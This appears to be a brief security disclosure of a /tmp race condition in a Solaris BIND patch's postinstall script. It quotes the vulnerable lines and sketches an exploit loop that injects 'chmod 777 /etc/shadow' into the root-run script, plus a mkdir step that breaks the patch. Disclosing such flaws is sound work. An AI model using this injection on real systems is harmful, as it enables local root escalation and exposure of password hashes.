There is a race condition with the postinstall script for SUNWbindr that if update manager is being used or smpatch while the system is in multi user mode could lead to arbitrary code execution as root. ./patches/119784-22/SUNWbindr/install/pkg_postinstall: UPGRADE=${TMP}/BIND_UPGRADE ./patches/119784-22/SUNWbindr/install/postinstall: UPGRADE=${TMP}/BIND_UPGRADE vulnerable code: UPGRADE=${TMP}/BIND_UPGRADE rm -f $UPGRADE (If I create the file first between these two steps, I should have ownership before it is over written and inject malicious code to get root.) cat >> $UPGRADE <<-\_UPDATE_START_METHOD oset=$@ # Remember current options if any. svc="svc:network/dns/server" if [ -z "$TMP" ]; then TMP="/tmp" fi Something like: while(1) { echo "chmod 777 /etc/shadow" >> /tmp/BIND_UPGRADE; } Or repeatedly touching the file and checking for write permission with the existence of the string BIND_UPGRADE in its contents would also mean you won the race. Then inject malicious code. At the least you can break the patch by creating a directory called /tmp/BIND_UPGRADE. # mkdir /tmp/BIND_UPGRADE